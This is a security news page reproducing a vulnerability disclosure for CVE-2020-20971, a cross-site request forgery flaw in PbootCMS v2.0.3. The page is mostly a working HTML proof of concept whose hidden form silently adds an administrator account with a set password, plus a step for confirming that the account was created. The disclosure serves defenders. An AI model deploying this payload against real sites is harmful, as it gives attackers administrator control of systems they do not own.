Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-20971: There is a CSRF vulnerability that can add the administrator account · Issue #1 · TplusSs/PbootCMS

Cross Site Request Forgery (CSRF) vulnerability in PbootCMS v2.0.3 via /admin.php?p=/User/index.

CVE
Open in Source
#csrf#vulnerability#php
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://pboot.com:12345/admin.php?p=/User/add" method="POST">
      <input type="hidden" name="formcheck" value="d48ee9bffae5f7fb7022ea1e7dd4a224" />
      <input type="hidden" name="username" value="TplusSs" />
      <input type="hidden" name="realname" value="asd" />
      <input type="hidden" name="password" value="123" />
      <input type="hidden" name="rpassword" value="123" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="roles&#91;0&#93;" value="R101" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Then open the “/admin.php?p=/User/index” page to see the added system administrator

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE